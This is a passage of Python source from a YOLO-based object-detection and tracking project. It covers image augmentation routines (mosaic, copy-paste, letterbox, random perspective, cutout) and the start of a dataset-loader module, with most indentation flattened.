img4, labels4, segments4 = copy_paste(img4, labels4, segments4, probability=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
            img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 9 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
#img9, labels9, segments9 = remove_background(img9, labels9, segments9)
img9, labels9, segments9 = copy_paste(img9, labels9, segments9, probability=self.hyp['copy_paste'])
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def load_samples(self, index):
    # builds a 4-mosaic (like load_mosaic) and returns object segments sampled from it for later paste-in
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
#img4, labels4, segments4 = remove_background(img4, labels4, segments4)
sample_labels, sample_images, sample_masks = sample_segments(img4, labels4, segments4, probability=0.5)
return sample_labels, sample_images, sample_masks
def copy_paste(img, labels, segments, probability=0.5):
# Implement Copy-Paste augmentation https://arxiv.org/abs/2012.07177, labels as nx5 np.array(cls, xyxy)
n = len(segments)
if probability and n:
h, w, c = img.shape # height, width, channels
im_new = np.zeros(img.shape, np.uint8)
for j in random.sample(range(n), k=round(probability * n)):
l, s = labels[j], segments[j]
box = w - l[3], l[2], w - l[1], l[4]
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
if (ioa < 0.30).all(): # allow 30% obscuration of existing labels
labels = np.concatenate((labels, [[l[0], *box]]), 0)
segments.append(np.concatenate((w - s[:, 0:1], s[:, 1:2]), 1))
cv2.drawContours(im_new, [segments[j].astype(np.int32)], -1, (255, 255, 255), cv2.FILLED)
result = cv2.bitwise_and(src1=img, src2=im_new)
result = cv2.flip(result, 1) # augment segments (flip left-right)
i = result > 0 # pixels to replace
# i[:, :] = result.max(2).reshape(h, w, 1) # act over ch
img[i] = result[i] # cv2.imwrite('debug.jpg', img) # debug
return img, labels, segments
def remove_background(img, labels, segments):
    # Remove everything outside the labelled segments, filling the background with grey (114); labels as nx5 np.array(cls, xyxy)
n = len(segments)
h, w, c = img.shape # height, width, channels
im_new = np.zeros(img.shape, np.uint8)
img_new = np.ones(img.shape, np.uint8) * 114
for j in range(n):
cv2.drawContours(im_new, [segments[j].astype(np.int32)], -1, (255, 255, 255), cv2.FILLED)
result = cv2.bitwise_and(src1=img, src2=im_new)
i = result > 0 # pixels to replace
img_new[i] = result[i] # cv2.imwrite('debug.jpg', img) # debug
return img_new, labels, segments
def sample_segments(img, labels, segments, probability=0.5):
    # Sample object crops and masks from the labelled segments (consumed by pastein); labels as nx5 np.array(cls, xyxy)
n = len(segments)
sample_labels = []
sample_images = []
sample_masks = []
if probability and n:
h, w, c = img.shape # height, width, channels
for j in random.sample(range(n), k=round(probability * n)):
l, s = labels[j], segments[j]
box = l[1].astype(int).clip(0,w-1), l[2].astype(int).clip(0,h-1), l[3].astype(int).clip(0,w-1), l[4].astype(int).clip(0,h-1)
#print(box)
if (box[2] <= box[0]) or (box[3] <= box[1]):
continue
sample_labels.append(l[0])
mask = np.zeros(img.shape, np.uint8)
cv2.drawContours(mask, [segments[j].astype(np.int32)], -1, (255, 255, 255), cv2.FILLED)
sample_masks.append(mask[box[1]:box[3],box[0]:box[2],:])
result = cv2.bitwise_and(src1=img, src2=mask)
i = result > 0 # pixels to replace
mask[i] = result[i] # cv2.imwrite('debug.jpg', img) # debug
#print(box)
sample_images.append(mask[box[1]:box[3],box[0]:box[2],:])
return sample_labels, sample_images, sample_masks
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
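# Usage sketch (illustrative; the file name is an assumption): pad-resize an image for inference and keep the
# ratio/padding so detections can later be mapped back to the original resolution:
#   im0 = cv2.imread('example.jpg')                                 # original BGR image
#   im, ratio, (dw, dh) = letterbox(im0, new_shape=640, stride=32)  # resized and padded to a stride multiple
#   # a point (x1, y1) in letterboxed coords maps back as ((x1 - dw) / ratio[0], (y1 - dh) / ratio[1])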
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1.1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
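# Worked example (illustrative numbers): a 100x80 px box warped down to 50x40 px keeps wh > 2 px, has an
# area ratio of (50*40)/(100*80) = 0.25 > 0.1 and an aspect ratio of max(50/40, 40/50) = 1.25 < 20, so it is
# kept; a box squashed to 1 px height fails the wh_thr test and is dropped.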
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
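# Worked example (illustrative numbers): box1 = [0, 0, 10, 10] and box2 = [[5, 5, 15, 15]] overlap on a
# 5x5 region, so bbox_ioa returns 25 / 100 = 0.25, i.e. 25% of box2's area is covered by box1.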
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def pastein(image, labels, sample_labels, sample_images, sample_masks):
    # Pastes sampled object crops into random regions of the image (copy-paste style augmentation, https://arxiv.org/abs/2012.07177)
h, w = image.shape[:2]
# create random masks
scales = [0.75] * 2 + [0.5] * 4 + [0.25] * 4 + [0.125] * 4 + [0.0625] * 6 # image size fraction
for s in scales:
if random.random() < 0.2:
continue
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
if len(labels):
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
else:
ioa = np.zeros(1)
if (ioa < 0.30).all() and len(sample_labels) and (xmax > xmin+20) and (ymax > ymin+20): # allow 30% obscuration of existing labels
sel_ind = random.randint(0, len(sample_labels)-1)
#print(len(sample_labels))
#print(sel_ind)
#print((xmax-xmin, ymax-ymin))
#print(image[ymin:ymax, xmin:xmax].shape)
#print([[sample_labels[sel_ind], *box]])
#print(labels.shape)
hs, ws, cs = sample_images[sel_ind].shape
r_scale = min((ymax-ymin)/hs, (xmax-xmin)/ws)
r_w = int(ws*r_scale)
r_h = int(hs*r_scale)
if (r_w > 10) and (r_h > 10):
r_mask = cv2.resize(sample_masks[sel_ind], (r_w, r_h))
r_image = cv2.resize(sample_images[sel_ind], (r_w, r_h))
temp_crop = image[ymin:ymin+r_h, xmin:xmin+r_w]
m_ind = r_mask > 0
                if m_ind.astype(int).sum() > 60:  # np.int is removed in recent NumPy; plain int keeps the same behaviour
temp_crop[m_ind] = r_image[m_ind]
#print(sample_labels[sel_ind])
#print(sample_images[sel_ind].shape)
#print(temp_crop.shape)
box = np.array([xmin, ymin, xmin+r_w, ymin+r_h], dtype=np.float32)
if len(labels):
labels = np.concatenate((labels, [[sample_labels[sel_ind], *box]]), 0)
else:
labels = np.array([[sample_labels[sel_ind], *box]])
image[ymin:ymin+r_h, xmin:xmin+r_w] = temp_crop
return labels
class Albumentations:
# YOLOv5 Albumentations class (optional, only used if package is installed)
    def __init__(self):
        self.transform = None
        try:
            import albumentations as A
            self.transform = A.Compose([
                A.CLAHE(p=0.01),
                A.RandomBrightnessContrast(brightness_limit=0.2, contrast_limit=0.2, p=0.01),
                A.RandomGamma(gamma_limit=[80, 120], p=0.01),
                A.Blur(p=0.01),
                A.MedianBlur(p=0.01),
                A.ToGray(p=0.01),
                A.ImageCompression(quality_lower=75, p=0.01)],
                bbox_params=A.BboxParams(format='pascal_voc', label_fields=['class_labels']))
            # logging.info(colorstr('albumentations: ') + ', '.join(f'{x}' for x in self.transform.transforms if x.p))
        except ImportError:  # package not installed (it is optional), transforms are simply skipped
            pass
def __call__(self, im, labels, p=1.0):
if self.transform and random.random() < p:
new = self.transform(image=im, bboxes=labels[:, 1:], class_labels=labels[:, 0]) # transformed
im, labels = new['image'], np.array([[c, *b] for c, b in zip(new['class_labels'], new['bboxes'])])
return im, labels
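# Usage sketch (illustrative; requires the optional 'albumentations' package and assumes pixel-coordinate labels):
#   aug = Albumentations()
#   im, labels = aug(im, labels, p=1.0)  # labels as nx5 np.array([[cls, x1, y1, x2, y2], ...]) to match
#                                        # the 'pascal_voc' bbox format declared in the Compose above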
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)  # np.int is removed in recent NumPy
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit('../coco')
Arguments
path: Path to images directory
weights: Train, val, test weights (list)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in img_formats], []) # image files only
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
def load_segmentations(self, index):
key = '/work/handsomejw66/coco17/' + self.img_files[index]
#print(key)
# /work/handsomejw66/coco17/
    return self.segs[key]


# dataloaders.py (TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/dataloaders.py)
import contextlib
import glob
import hashlib
import json
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
import numpy as np
import psutil
import torch
import torch.nn.functional as F
import torchvision
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import (Albumentations, augment_hsv, classify_albumentations, classify_transforms, copy_paste,
letterbox, mixup, random_perspective)
from utils.general import (DATASETS_DIR, LOGGER, NUM_THREADS, TQDM_BAR_FORMAT, check_dataset, check_requirements,
check_yaml, clean_str, cv2, is_colab, is_kaggle, segments2boxes, unzip_file, xyn2xy,
xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'See https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = 'bmp', 'dng', 'jpeg', 'jpg', 'mpo', 'png', 'tif', 'tiff', 'webp', 'pfm' # include image suffixes
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
LOCAL_RANK = int(os.getenv('LOCAL_RANK', -1)) # https://pytorch.org/docs/stable/elastic/run.html
RANK = int(os.getenv('RANK', -1))
PIN_MEMORY = str(os.getenv('PIN_MEMORY', True)).lower() == 'true' # global pin_memory for dataloaders
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
with contextlib.suppress(Exception):
rotation = dict(img._getexif().items())[orientation]
if rotation in [6, 8]: # rotation 270 or 90
s = (s[1], s[0])
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {
2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
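# Usage sketch (illustrative; the file name is an assumption): rotate a phone photo upright before use:
#   im = exif_transpose(Image.open('photo.jpg'))  # returns a correctly oriented image with the EXIF orientation tag removed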
def seed_worker(worker_id):
# Set dataloader worker seed https://pytorch.org/docs/stable/notes/randomness.html#dataloader
worker_seed = torch.initial_seed() % 2 ** 32
np.random.seed(worker_seed)
random.seed(worker_seed)
def create_dataloader(path,
imgsz,
batch_size,
stride,
single_cls=False,
hyp=None,
augment=False,
cache=False,
pad=0.0,
rect=False,
rank=-1,
workers=8,
image_weights=False,
close_mosaic=False,
quad=False,
min_items=0,
prefix='',
shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING ⚠️ --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(
path,
imgsz,
batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
min_items=min_items,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nd = torch.cuda.device_count() # number of CUDA devices
nw = min([os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
#loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
loader = DataLoader if image_weights or close_mosaic else InfiniteDataLoader
generator = torch.Generator()
generator.manual_seed(6148914691236517205 + RANK)
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=PIN_MEMORY,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn,
worker_init_fn=seed_worker,
generator=generator), dataset
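# Usage sketch (illustrative; the dataset path and hyp dict are assumptions, normally read from data/hyp YAML files):
#   train_loader, dataset = create_dataloader('../datasets/coco128/images/train2017', imgsz=640, batch_size=16,
#                                             stride=32, hyp=hyp, augment=True, shuffle=True)
#   for imgs, targets, paths, shapes in train_loader:
#       imgs = imgs.float() / 255  # uint8 BCHW RGB batch -> float in [0, 1]
#       # targets is an (n, 6) tensor of [image_index, class, x, y, w, h] with normalized xywh coordinates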
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for _ in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadScreenshots:
# YOLOv5 screenshot dataloader, i.e. `python detect.py --source "screen 0 100 100 512 256"`
def __init__(self, source, img_size=640, stride=32, auto=True, transforms=None):
# source = [screen_number left top width height] (pixels)
check_requirements('mss')
import mss
source, *params = source.split()
self.screen, left, top, width, height = 0, None, None, None, None # default to full screen 0
if len(params) == 1:
self.screen = int(params[0])
elif len(params) == 4:
left, top, width, height = (int(x) for x in params)
elif len(params) == 5:
self.screen, left, top, width, height = (int(x) for x in params)
self.img_size = img_size
self.stride = stride
self.transforms = transforms
self.auto = auto
self.mode = 'stream'
self.frame = 0
self.sct = mss.mss()
# Parse monitor shape
monitor = self.sct.monitors[self.screen]
self.top = monitor["top"] if top is None else (monitor["top"] + top)
self.left = monitor["left"] if left is None else (monitor["left"] + left)
self.width = width or monitor["width"]
self.height = height or monitor["height"]
self.monitor = {"left": self.left, "top": self.top, "width": self.width, "height": self.height}
def __iter__(self):
return self
def __next__(self):
# mss screen capture: get raw pixels from the screen as np array
im0 = np.array(self.sct.grab(self.monitor))[:, :, :3] # [:, :, :3] BGRA to BGR
s = f"screen {self.screen} (LTWH): {self.left},{self.top},{self.width},{self.height}: "
if self.transforms:
im = self.transforms(im0) # transforms
else:
im = letterbox(im0, self.img_size, stride=self.stride, auto=self.auto)[0] # padded resize
im = im.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
im = np.ascontiguousarray(im) # contiguous
self.frame += 1
return str(self.screen), im, im0, None, s # screen, img, original img, im0s, s
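# Usage sketch (illustrative): stream 512x256 crops of monitor 0 starting at (100, 100), matching the
# example source string given in the class comment above:
#   for screen, im, im0, _, s in LoadScreenshots('screen 0 100 100 512 256', img_size=640):
#       ...  # im is the letterboxed CHW RGB array, im0 the raw BGR capture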
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True, transforms=None, vid_stride=1):
files = []
for p in sorted(path) if isinstance(path, (list, tuple)) else [path]:
p = str(Path(p).resolve())
